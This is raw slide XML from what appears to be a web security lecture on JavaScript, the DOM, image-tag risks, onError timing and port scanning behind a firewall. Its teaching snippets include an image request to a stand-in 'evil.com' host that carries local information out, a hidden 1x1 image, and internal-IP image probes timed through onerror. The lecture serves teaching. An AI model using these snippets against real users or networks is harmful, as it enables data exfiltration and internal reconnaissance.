              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(),  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>clearTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()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4770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www.w3schools.com/js/js_output.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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6894003" cy="34778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&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br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&lt;h1&gt;My First Web Page&lt;/h1&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;p&gt;My first paragraph.&lt;/p&gt;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&lt;button </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(5 + 6)"&gt;Try it&lt;/button&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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03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/>
              <a:t>Document Object Model (DOM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13373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5344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Object-oriented interface used to read and write docs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web page in HTML is structured data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DOM provides representation of this hierarchy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69406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.alinkColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, document.URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[ ], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[ ], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.anchors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[ ]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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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smtClean="0"/>
              <a:t>Includes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Browser Object Model (BOM)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window, document, frames[], history, location, navigator (type and version of browser)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4770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www.w3schools.com/js/js_output.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/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6565580" cy="470898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&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;body&gt;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&lt;h1&gt;My First Web Page&lt;/h1&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;p&gt;My First Paragraph&lt;/p&gt;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&lt;p id="demo"&gt;&lt;/p&gt;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&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("demo").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 5 + 6;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/script&gt;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&lt;/body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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4090323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Changing HTML using Script, DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256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Some possibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>createElement(elementName)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>createTextNode(text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>appendChild(newChild)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>removeChild(node)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Example: Add a new list item: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1143000" y="4114800"/>
            <a:ext cx="59436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kumimoji="1"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list = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('t1')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document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('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')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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>document.createTextNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(text)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list.appendChild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newitem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)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newitem.appendChild</a:t>
            </a:r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newtext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5638800" y="1447800"/>
            <a:ext cx="2514600" cy="1447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 id="t1"&gt;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 Item 1 &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;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54563" y="1447800"/>
            <a:ext cx="8318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solidFill>
                  <a:srgbClr val="869406"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr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53033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 Image Tags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6E595C-B8A9-4129-BDA4-5CF617B3E06C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43013" name="Picture 4" descr="beach suns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114800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057400" y="5029200"/>
            <a:ext cx="3352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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Displays this nice picture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Security issues?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1600200"/>
            <a:ext cx="8251939" cy="181588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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;html&gt;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&lt;p&gt;  … &lt;/p&gt;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=“http://example.com/sunset.gif” height="50" width="100"&gt; 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  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/html&gt;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web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tag security issues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37600" y="6616700"/>
            <a:ext cx="355600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68522F2-BA83-4287-A1B3-FDFCCF02D90D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036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Communicate with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=“http://evil.com/pass-local-information.jpg?extra_information”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hide resulting image 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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“ … ” height=“1" width=“1"&gt; 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Spoof other sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Add logos that fool a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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90600" y="5791200"/>
            <a:ext cx="7315200" cy="400050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web page can send information to any site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746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 consequences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6324600"/>
            <a:ext cx="572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Q: what threat model are we talking about here?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onError</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5222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Basic function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Triggered when error occurs loading a document or an image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Example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>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> handler if image does not exist and cannot load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3495675"/>
            <a:ext cx="7467600" cy="9239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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>img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="image.gif" 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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>="alert('The image could not be loaded.')“</a:t>
            </a:r>
          </a:p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6153150"/>
            <a:ext cx="5872163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dirty="0"/>
              <a:t>http://www.w3schools.com/jsref/jsref_onError.asp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web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JavaScript timing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5325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smtClean="0"/>
              <a:t>Sample code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  <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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  <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2316162"/>
            <a:ext cx="7467600" cy="317023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0" lvl="1">
              <a:buFont typeface="Times" pitchFamily="1" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;html&gt;&lt;body&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> id="test" style="display: none"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;script&gt;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test = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(’test’);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var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> start = new Date();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>test.onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> end = new Date();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>          alert("Total time: " + (end - start));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     test.src = "http://www.example.com/page.html";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/body&gt;&lt;/html&gt;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152400"/>
            <a:ext cx="2767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Basic web functionality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447800"/>
            <a:ext cx="87439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 vs System vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Content Placeholder 1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5334000"/>
            <a:ext cx="7772400" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Decline in % web vulns since 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>49% in 2010 -&gt; 37% in 2011.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Big decline in SQL Injection vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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3862388" y="2011363"/>
            <a:ext cx="17827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>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS peak</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22534" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="3451225" y="2217738"/>
            <a:ext cx="411163" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="lg" len="med"/>
            <a:tailEnd type="arrow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2819400" y="1447800"/>
            <a:ext cx="403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846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Port scanning behind firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501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JavaScript can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Request images from internal IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Example:  &lt;img src=“192.168.0.4:8080”/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Use timeout/onError to determine success/failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Fingerprint webapps using known image names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50180" name="Picture 4" descr="DS15serverfro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4040188"/>
            <a:ext cx="243681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3975100" y="3883025"/>
            <a:ext cx="46038" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="3175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812800" y="3698875"/>
            <a:ext cx="9096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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50183" name="Picture 8" descr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40363" y="4279900"/>
            <a:ext cx="1487487" cy="11382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5961" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5459413" y="4478338"/>
            <a:ext cx="1387475" cy="796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>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50185" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4211638" y="6477000"/>
            <a:ext cx="1046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Firewall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00338" y="3771900"/>
            <a:ext cx="3781425" cy="650875"/>
            <a:chOff x="1760" y="2186"/>
            <a:chExt cx="2382" cy="410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50206" name="Freeform 12"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1760" y="2364"/>
              <a:ext cx="1605" cy="232"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1197"/>
                <a:gd name="T1" fmla="*/ 1280 h 211"/>
                <a:gd name="T2" fmla="*/ 168353 w 1197"/>
                <a:gd name="T3" fmla="*/ 5 h 211"/>
                <a:gd name="T4" fmla="*/ 315092 w 1197"/>
                <a:gd name="T5" fmla="*/ 1098 h 211"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1197"/>
                <a:gd name="T10" fmla="*/ 0 h 211"/>
                <a:gd name="T11" fmla="*/ 1197 w 1197"/>
                <a:gd name="T12" fmla="*/ 211 h 2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97" h="211">
                  <a:moveTo>
                    <a:pt x="0" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="110"/>
                    <a:pt x="441" y="10"/>
                    <a:pt x="640" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="0"/>
                    <a:pt x="1018" y="90"/>
                    <a:pt x="1197" y="18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7" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2664" y="2186"/>
              <a:ext cx="147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1) “show me dancing pigs!”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2297113" y="4332288"/>
            <a:ext cx="2976562" cy="709612"/>
            <a:chOff x="1506" y="2539"/>
            <a:chExt cx="1875" cy="447"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50204" name="Freeform 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1858" y="2539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5" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1506" y="2813"/>
              <a:ext cx="101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2) “check this out”</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50188" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5599113" y="5387975"/>
            <a:ext cx="1100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chemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50189" name="Picture 17" descr="cisco-520-2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0288" y="5807075"/>
            <a:ext cx="1425575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953250" y="2874963"/>
            <a:ext cx="1855788" cy="1420812"/>
            <a:chOff x="4439" y="1621"/>
            <a:chExt cx="1169" cy="895"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50201" name="Picture 11" descr="CompaqAlphaServerES4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80" y="1621"/>
              <a:ext cx="728" cy="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202" name="Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4439" y="2054"/>
              <a:ext cx="32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3" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4541" y="2204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6981825" y="4876800"/>
            <a:ext cx="1751013" cy="1436688"/>
            <a:chOff x="4457" y="2882"/>
            <a:chExt cx="1103" cy="905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50198" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop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55" y="2882"/>
              <a:ext cx="905" cy="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199" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4504" y="3017"/>
              <a:ext cx="341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200" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4457" y="3152"/>
              <a:ext cx="27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4826000" y="5535613"/>
            <a:ext cx="666750" cy="384175"/>
            <a:chOff x="3048" y="3297"/>
            <a:chExt cx="473" cy="383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50196" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3048" y="3297"/>
